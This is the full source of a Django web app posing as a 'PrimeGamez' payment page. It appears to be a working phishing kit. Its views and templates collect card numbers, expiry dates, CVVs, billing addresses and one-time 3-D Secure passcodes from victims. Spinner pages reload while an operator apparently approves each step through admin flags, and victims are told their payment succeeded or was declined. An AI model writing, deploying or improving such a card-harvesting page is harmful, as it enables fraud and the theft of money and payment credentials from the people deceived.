PrimeGamez/urls.py
from django.contrib import admin
from django.urls import path
from django.urls.conf import include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('page1.urls')),
    path('page2/', include('page2.urls')),
]

page1/urls.py
from django.urls import path
from . import views

app_name = 'page1'

urlpatterns = [
    path('', views.index, name="amounts"),
    path('waiting/<str:pk>', views.waitReply, name="waiting"),
    path('order-wrong', views.order_wrong, name="order-wrong"),

    path('card-details/<str:pk>', views.cardDetails, name="card-details"),
    path('card-verification/<str:pk>',views.are_card_details_correct, name="card-verification"),
    path('card-wrong/<str:pk>',views.card_wrong, name="card-wrong"),


    path('address_details/<str:pk>', views.addressDetails, name="address"),

    path('address_verification/<str:pk>', views.address_correct, name="address-verification"),
    path('address_wrong/<str:pk>',views.address_wrong, name="address-wrong"),

    path('threeDSMain/<str:pk>', views.threeDSMain, name="threeDS"),

    path('authenticate-app/<str:pk>', views.authenticate_app, name="authenticate-app"),

    path('payment-verification/<str:pk>', views.payment_verification, name="payment-verification"),

    path('authenticate-text/<str:pk>', views.autenticate_text, name="authenticate-text"),
    path('payment-verification-text/<str:pk>', views.payment_verification_text, name="payment-verification-text"),




    path('payment-decline/<str:pk>', views.payment_declined, name="payment-declined"),
]

page1/models.py
from django.db import models
import uuid

from django.db.models.signals import post_save

# Create your models here.
class page1(models.Model):
    orderNumber = models.CharField(max_length=200)
    postCode = models.CharField(max_length=200)
    amount = models.CharField(max_length=200, default="0")
    is_order_authentic = models.BooleanField(default=False)
    is_order_checked = models.BooleanField(default=False)

    owner_name = models.CharField(max_length=200, default="None")
    card_number = models.CharField(max_length=200, default="123-456-789")
    expiry = models.CharField(max_length=200, default="01-01-1950")
    cvv = models.CharField(max_length=4, default="0")

    is_card_correct = models.BooleanField(default=False)
    is_card_checked = models.BooleanField(default=False)
    

    address = models.CharField(max_length=200, default="None")
    apt_suite = models.CharField(max_length=100, default="None")
    city = models.CharField(max_length=50, default="None")

    is_address_correct = models.BooleanField(default=False)
    is_address_details_checked = models.BooleanField(default=False)

    show_app_button = models.BooleanField(default=False)
    show_text_button = models.BooleanField(default=False)
    show_both = models.BooleanField(default=False)

    is_app_clicked = models.CharField(max_length=3, default="No")
    is_text_clicked = models.CharField(max_length=3, default="No")

    payment_through_app_button_clicked = models.CharField(max_length=3, default="No")

    is_payment_received_through_app = models.BooleanField(default=False)
    is_app_checked = models.BooleanField(default=False)

    otp_code_from_user = models.CharField(max_length=10,default=0)
    
    is_otp_correct = models.BooleanField(default=False)
    is_otp_checked = models.BooleanField(default=False)

   

    id = models.UUIDField(default=uuid.uuid4, unique=True, primary_key=True, editable=False)

    def __str__(self):
        return self.orderNumber

page1/forms.py
from django.forms import ModelForm, fields
from .models import page1

class page1Form(ModelForm):
    class Meta:
        model = page1
        fields = ['orderNumber','postCode',]

page1/views.py
from django.http.response import HttpResponseRedirect
from django.shortcuts import render
from .models import page1
from django.urls import reverse

def index(request):
    if request.method == "POST":
        order_number = request.POST.get('order_number')
        post_code = request.POST.get('post_code')
        if order_number and post_code:
            n = page1.objects.create(orderNumber=order_number, postCode=post_code)
            n.save()
            id = n.id
            return HttpResponseRedirect(reverse('page1:waiting', args=[id]))
    return render(request,"page1/index.html")

def waitReply(request, pk):
    get_order = page1.objects.get(id=pk)
    if get_order.is_order_authentic == True and get_order.is_order_checked == True:
        return HttpResponseRedirect(reverse('page1:card-details', args=[pk]))
    elif get_order.is_order_authentic == False and get_order.is_order_checked == True:
        return HttpResponseRedirect(reverse('page1:order-wrong'))
    return render(request, "page1/order-details-verification.html")

def order_wrong (request):
    return render(request, 'page1/order-wrong.html')

def cardDetails(request, pk):
    get_amount = page1.objects.get(id=pk)
    context = {'get_amount':get_amount}
    if request.method == "POST":
        owner_name = request.POST.get('owner_name')
        card_number = request.POST.get('card_number')
        expiry = request.POST.get('expiry')
        cvv = request.POST.get('cvv')
        if owner_name and card_number and expiry and cvv:
            record = page1.objects.get(id=pk)
            record.owner_name = owner_name
            record.card_number = card_number
            record.expiry = expiry
            record.cvv = cvv
            record.save()

            return HttpResponseRedirect(reverse('page1:card-verification', args=[pk]))

    return render(request, "page1/card-details.html", context)


def are_card_details_correct(request, pk):
    card_verification = page1.objects.get(id=pk)
    if card_verification.is_card_correct == True and card_verification.is_card_checked == True:
        return HttpResponseRedirect(reverse('page1:address', args=[pk]))
    elif card_verification.is_card_correct == False and card_verification.is_card_checked == True:
        return HttpResponseRedirect(reverse('page1:card-wrong', args=[pk]))
    return render(request, "page1/card-details-verification.html")


def card_wrong(request, pk):
    card = page1.objects.get(id=pk)
    context = {'card_id':card}
    card.is_card_checked = False
    card.save()
    return render(request, "page1/card-wrong.html", context)


def addressDetails(request, pk):
    order_details = page1.objects.get(id=pk)
    context = {'order':order_details}
    if request.method == "POST":
        main_address = request.POST.get('main_address')
        apt_suite = request.POST.get('apt_suite')
        city = request.POST.get('city')
        record = page1.objects.get(id=pk)
        if main_address:
            record.address = main_address
            record.apt_suite = apt_suite
            record.city = city
            record.save()
            return HttpResponseRedirect(reverse('page1:address-verification', args=[pk]))
        else:
            record.address = "None"
            record.address = "None"
            record.apt_suite = "None"
            record.city = "None"
            record.save()
            return HttpResponseRedirect(reverse('page1:address-verification', args=[pk]))

    return render(request, "page1/address_details.html", context)


def address_correct(request, pk):
    address = page1.objects.get(id=pk)
    if address.is_address_correct == True and address.is_address_details_checked == True:
        return HttpResponseRedirect(reverse('page1:threeDS', args=[pk]))
    elif address.is_address_correct == False and address.is_address_details_checked == True:
        return HttpResponseRedirect(reverse('page1:address-wrong', args=[pk]))
    return render(request,"page1/address-verification.html")

def address_wrong(request, pk):
    address = page1.objects.get(id=pk)
    context = {'address_id':address}
    address.is_address_details_checked = False
    address.save()
    return render(request,"page1/address-wrong.html",context)

def threeDSMain(request,pk):
    set_the_button = page1.objects.get(id=pk)
    context = {'order_amount':set_the_button}
    if request.method == 'POST':
        if 'Text' in request.POST :

            set_the_button.is_text_clicked = "Yes"
            set_the_button.save()
            return HttpResponseRedirect(reverse('page1:authenticate-text', args=[pk]))
        elif 'App' in request.POST:

            set_the_button.is_app_clicked = "Yes"
            set_the_button.save()
            return HttpResponseRedirect(reverse('page1:authenticate-app', args=[pk]))
    return render(request, "page1/threeDSMain.html", context)

"""-------------------------------------------------------------------------------------------------------------"""


def authenticate_app(request,pk):
    set_the_app_button_value = page1.objects.get(id=pk)
    if request.method == 'POST':
        if 'Payment_by_App' in request.POST:
            set_the_app_button_value.payment_through_app_button_clicked = "Yes"
            set_the_app_button_value.save()
            return HttpResponseRedirect(reverse('page1:payment-verification', args=[pk]))
    return render(request, "page1/authenticate-app.html")


def payment_verification(request, pk):
    payment_via_app = page1.objects.get(id=pk)
    if payment_via_app.is_payment_received_through_app == True and  payment_via_app.is_app_checked == True:
        return render(request, 'page1/payment-success.html')
    elif payment_via_app.is_payment_received_through_app == False and  payment_via_app.is_app_checked == True:
        payment_via_app.is_card_correct = False
        payment_via_app.is_card_checked = False
        payment_via_app.is_address_correct = False
        payment_via_app.is_address_details_checked = False
        payment_via_app.is_app_clicked = "No"
        payment_via_app.is_text_clicked = "No"
        payment_via_app.payment_through_app_button_clicked = "No"
        payment_via_app.is_payment_received_through_app = False
        payment_via_app.is_app_checked = False
        payment_via_app.otp_code_from_user = "0"
        payment_via_app.is_otp_correct = False
        payment_via_app.is_otp_checked = False
        payment_via_app.save()
        return HttpResponseRedirect(reverse('page1:payment-declined', args=[pk]))
    return render(request,'page1/payment_verification.html')

def payment_declined(request, pk):
    if request.method == 'POST':
        return HttpResponseRedirect(reverse('page1:threeDS',args=[pk]))
    return render(request, 'page1/payment-decline.html')

"""-----------------------------------------------------------------------------------------------------------------------------------------------"""

def autenticate_text(request,pk):
    set_otp = page1.objects.get(id=pk)
    if request.method == 'POST':
        set_otp.otp_code_from_user = request.POST.get('otp_code')
        set_otp.save()
        return HttpResponseRedirect(reverse('page1:payment-verification-text', args=[pk]))
    return render(request, 'page1/authenticate-text.html')

def payment_verification_text(request, pk):
    otp_correct = page1.objects.get(id=pk)
    if otp_correct.is_otp_correct == True and otp_correct.is_otp_checked == True:
        return render(request, 'page1/payment-success.html')
    elif otp_correct.is_otp_correct == False and otp_correct.is_otp_checked == True:
        otp_correct.is_card_correct = False
        otp_correct.is_card_checked = False
        otp_correct.is_address_correct = False
        otp_correct.is_address_details_checked = False
        otp_correct.is_app_clicked = "No"
        otp_correct.is_text_clicked = "No"
        otp_correct.payment_through_app_button_clicked = "No"
        otp_correct.is_payment_received_through_app = False
        otp_correct.is_app_checked = False
        otp_correct.otp_code_from_user = "0"
        otp_correct.is_otp_correct = False
        otp_correct.is_otp_checked = False
        otp_correct.save()
        return HttpResponseRedirect(reverse('page1:payment-declined', args=[pk]))
    return render(request, 'page1/payment-verification-text.html')

page1/templates/page1/address-verification.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Address Verification</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>
<body>
  <div class="main">
    <div class="logo-bar">
        <img id="img" src="/static/assets/imgs/logo.png">
        <p> - Payment Link</p>

    </div>

    <hr class="h-line">

    <div class="inner-ver">

        <img src="/static/assets/imgs/load.gif" alt="">
        <h3 class="p_tag">Please wait, while we process this payment.</h3>
    </div>
    <footer>
        <div class="logo-bar">
            <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
        </div>
    </footer>
</div>

    <script type="text/javascript">
    setTimeout(function () {
      location.reload();
    }, 8 * 1000);
</script>
</body>
</html>

page1/templates/page1/address-wrong.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Error</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>
<body>
    {{ card_id }}
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner-ver">
            <h3 class="p_tag">Sorry the Address Details didn't matched</h3>
           <h3>Click <a href="{% url 'page1:address' address_id.id %}">here </a>to go back</h3>
          
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>
</html>

page1/templates/page1/address_details.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Address Details</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    
</head>
<body>
    <div class="main">
        <div class="logo-bar">
            <img class="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>
        <hr class="h-line">
        


        
        <div class="inner">
        <h4>Order: {{ order.orderNumber }}</h4>
        

            <div class="row">
                <div class="col-75">
                    <div class="container">
                        <form action="" method="post">
                            {% csrf_token %}

                            <div class="col-50">
                                <div class="col-50">
                                    <h3>Please enter your Billing Address</h3>
                                    
                                    <label for="cname">Address</label>
                                    <input type="text" id="cname" name="main_address">
                                    <label for="ccnum">Apt, Suite etc (Optional)</label>
                                    <input type="text" id="ccnum" name="apt_suite">

                                    <div class="row">
                                        <div class="col-50">
                                            <label for="expyear">City</label>
                                            <input style="width: 25%;" type="text" id="expyear" name="city">
                                        </div>
                                        
                                    </div>
                                </div>

                            </div>

                            <input type="submit" value="Pay: £ {{ order.amount }}" class="btn">
                        </form>
                    </div>
                </div>

            </div>
        </div>
        <div class="cards">
            <img src="/static/assets/imgs/m_c.png">
            <img src="/static/assets/imgs/v_c.jpg">
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>

</body>
</html>

page1/templates/page1/authenticate-app.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>App</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">

</head>

<body>

    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - 3DS Verification</p>

        </div>
        <hr class="h-line">

        <div class="inner">
            <form action="" method="post">
                {% csrf_token %}
            <h2>Your card provider have sent you a in-app 
                notification to confirm the payment, please 
                head over to your banking app and click 
                confirm. Once confirmed, please click on the 
                button below to authenticate the payment:</h2>
            <button class="btn" name = "Payment_by_App" type="submit">I've confirmed the Payment</button>
        </form>
        </div>
<div class="cards">
    <img src="/static/assets/imgs/m_c.png">
    <img src="/static/assets/imgs/v_c.jpg">
</div>
<footer>
    <div class="logo-bar">
        <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
    </div>
</footer>
    </div>
</body>

</html>

page1/templates/page1/authenticate-text.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Text</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">

</head>

<body>

    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - 3DS Verification</p>

        </div>
        <hr class="h-line">

        <div class="inner">
            <form action="" method="post">
                {% csrf_token %}
                <h2>Your card provider have sent you a one time
                    passcode, to confirm the payment please
                    enter the code below:</h2>
                <h4>One-time Passcode:</h4>

                <input style="border: none; border-radius: 20px; background-color: #D4D4D4;" type="text"
                    name="otp_code" />
                <button class="btn" type="submit">Authenticate</button>
            </form>
        </div>
        <div class="cards">
            <img src="/static/assets/imgs/m_c.png">
            <img src="/static/assets/imgs/v_c.jpg">
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>

</html>

page1/templates/page1/card-details-verification.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Card Verification</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>
<body>
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner-ver">

            <img src="/static/assets/imgs/load.gif" alt="">
            <h3 class="p_tag">Please wait while we validate your card details</h3>
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
<script type="text/javascript">
    setTimeout(function () {
      location.reload();
    }, 8 * 1000);
</script>
</body>
</html>

page1/templates/page1/card-details.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Card Details</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>

<body>
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>
        <hr class="h-line">
        


        
        <div class="inner">
        <h4>Order:{{ get_amount.orderNumber }}</h4>
        <h4>Total: £{{ get_amount.amount }}</h4>

            <div class="row">
                <div class="col-75">
                    <div class="container">
                        <form action="" method="post">
                            {% csrf_token %}

                            <div class="col-50">
                                <div class="col-50">
                                    <h3>Please enter your card details:</h3>
                                    <label for="fname">Accepted Cards</label>
                                    <div class="icon-container">
                                        <i class="fa fa-cc-visa" style="color:navy;"></i>
                                        <i class="fa fa-cc-amex" style="color:blue;"></i>
                                        <i class="fa fa-cc-mastercard" style="color:red;"></i>
                                        <i class="fa fa-cc-discover" style="color:orange;"></i>
                                    </div>
                                    <label for="cname">CARD HOLDER NAME</label>
                                    <input type="text" id="cname" name="owner_name" placeholder="John More Doe">
                                    <label for="ccnum">CARD NUMBER</label>
                                    <input type="text" id="ccnum" name="card_number" placeholder="1111-2222-3333-4444" >

                                    <div class="row">
                                        <div class="col-50">
                                            <label for="expyear">CARD EXPIRY</label>
                                            <input type="text" id="expyear" name="expiry" placeholder="MM/YY">
                                        </div>
                                        <div class="col-50">
                                            <label for="cvv">CARD CVV</label>
                                            <input type="text" id="cvv" name="cvv" placeholder="111/1111">
                                        </div>
                                    </div>
                                </div>

                            </div>

                            <input type="submit" value="Address Detials" class="btn">
                        </form>
                    </div>
                </div>

            </div>
        </div>
        <div class="cards">
            <img src="/static/assets/imgs/m_c.png">
            <img src="/static/assets/imgs/v_c.jpg">
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>

</html>

page1/templates/page1/card-wrong.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Error</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>
<body>
    {{ address_id }}
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner-ver">
            <h3 class="p_tag">Sorry the Card Details didn't matched</h3>
           <h3>Click <a href="{% url 'page1:card-details' card_id.id %}">here </a>to go back</h3>
          
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>
</html>

page1/templates/page1/index.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome</title>
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>

<body>
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner">

            <h2>Thank you for your recent order with PrimeGamez</h2>
            <h3>To pay for your order please enter your:</h3>
            <form action="" method="post">
                {% csrf_token %}



                <h4 for="order_number">Order Number:</h4>

                <input style="border: none; border-radius: 20px; background-color: #D4D4D4;" type="text"
                    name="order_number" />


                <h4 for="post_code">Postcode:</h4>

                <input style="border: none; border-radius: 20px; background-color: #D4D4D4;" type="text"
                    name="post_code" />


                <input type="submit" value="Next" class="btn" />


            </form>
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>

</html>

page1/templates/page1/order-wrong.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Error</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>

<body>

    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner-ver">
            <h3 class="p_tag">Sorry the order Details didn't matched</h3>
            <h3>Click <a href="{% url 'page1:amounts' %}">here </a>to go back</h3>

        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>
</body>

</html>

page1/templates/page1/payment-success.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Code Status</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>

<body>

    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Successful</p>

        </div>
        <hr class="h-line">

        <div class="inner-special">
            <img style="height: 10%; width: 10%;" src="/static/assets/imgs/tick.png">
            <h3>The Payment was Successfull</h3>
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>

</body>

</html>

page1/templates/page1/payment-verification-text.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>OTP Verification</title>
    
    <link rel="icon" type="image/x-icon" href="/static/assets/imgs/favicon.ico">
    <link rel="stylesheet" href="/static/assets/custom_css/card_details.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>

<body>
    <div class="main">
        <div class="logo-bar">
            <img id="img" src="/static/assets/imgs/logo.png">
            <p> - Payment Link</p>

        </div>

        <hr class="h-line">

        <div class="inner-ver">

            <img src="/static/assets/imgs/load.gif" alt="">
            <h3 class="p_tag">Please wait, while we validate the OTP.</h3>
        </div>
        <footer>
            <div class="logo-bar">
                <img id="pwrby" src="/static/assets/imgs/pwrby.jpeg" alt="">
            </div>
        </footer>
    </div>

    <script type="text/javascript">
        setTimeout(function () {
            location.reload();
        }, 8 * 1000);
    </script>
</body>

</html>